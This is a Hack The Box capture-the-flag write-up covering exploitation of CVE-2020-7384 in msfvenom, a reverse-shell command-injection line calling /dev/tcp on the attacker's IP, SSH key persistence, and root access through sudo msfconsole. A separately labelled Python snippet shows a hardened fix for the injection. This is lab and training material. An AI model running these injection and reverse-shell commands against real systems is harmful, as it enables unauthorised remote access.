I am in the midst of my pursuit of the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on the Hack The Box (HTB) platform. HTB is a great platform for practising and learning new penetration testing skills as well as taking on the challenge of "capturing the flag" on their machines.
Yet another box!
My first step would be to run a Nmap scan:
nmap -Pn -sC -sV -oN initial 10.10.10.226
These were the results:
Scanning and Enumeration
Seeing port 5000 was open, I visited it and was greeted with this page:
There were 3 tools on the page: Nmap, MsfVenom and Searchsploit. They all worked as per usual. Realising I was getting nowhere, I started Googling about vulnerabilities these tools may have and stumbled upon CVE-2020-7384: MsfVenom APK template command injection.
I quickly fired up MsfConsole and used exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection with the following options:
I fired up a Netcat listener to catch any incoming shells: nc -nlvp 4444. Then, I uploaded the malicious template that I had just generated to the website with the following options:
Upon hitting generate, I was greeted with a shell on Netcat. I then upgraded my shell using Python and grabbed the user flag:
Then, I generated a pair of SSH keys and placed the public key on the remote machine. This was to stabilise my connection and access the machine with SSH:
Scanning and Enumeration
After enumerating the machine, I found another user, pwn, and a script in the user's home directory. Analysing the script, I realised that Nmap was running against a file called
Exploitation & Gaining Access
I fired up another Netcat listener to catch any incoming shells and used a bash script to run a reverse shell to access the pwn user account:
echo "HRI ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1' #" >> hackers
And it worked!
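The privilege escalation above works because a script interpolates lines from a user-writeable file into a shell command, so a ";" in the file ends the Nmap command and starts a new one. As an added example (not the box's script, which is not shown here, and not code from the original post), the snippet below contrasts that hypothetical vulnerable pattern with a hardened version that validates each target and passes it to Nmap as a single argv element; the target file contents are constructed.

```python
import re
import stat
import subprocess

# Constructed target-file contents: two legitimate hosts and one line
# carrying shell metacharacters of the kind the writeup appends.
SAMPLE_TARGETS = [
    "10.10.10.226",
    "scanme.example.internal",
    "HRI ;/bin/bash -c 'echo injected' #",
]

# Hostname / dotted-IP shape: labels of letters, digits and hyphens joined
# by dots. Anything else (spaces, ';', quotes, '#') is rejected outright.
HOST_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def vulnerable_command(line):
    """The string a shell receives when a script does os.system(f"nmap -sn {line}").
    With shell=True or os.system, ';' in the line becomes a command separator."""
    return f"nmap -sn {line}"

def is_valid_target(line):
    return len(line) <= 253 and bool(HOST_RE.match(line))

def filter_targets(lines):
    """Hardened intake: split lines into accepted targets and rejected junk."""
    accepted, rejected = [], []
    for raw in lines:
        line = raw.strip()
        (accepted if is_valid_target(line) else rejected).append(line)
    return accepted, rejected

def build_argv(target):
    """Argument-list form: no shell parses this, so metacharacters are inert."""
    return ["nmap", "-sn", target]

def is_safe_mode(st_mode):
    """A target file that group or others can write is itself the bug."""
    return not (st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def scan(target, dry_run=True):
    """Runs the hardened command (dry_run returns the argv instead of executing)."""
    argv = build_argv(target)
    if dry_run:
        return argv
    return subprocess.run(argv, capture_output=True, text=True).returncode
```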
Next, I checked the permissions this user had and realised that it could run MsfConsole as root without a password.
Thus, I ran sudo msfconsole, used the command /bin/bash to open a shell and found the root hash!
It was a fun box! On to the next one 😃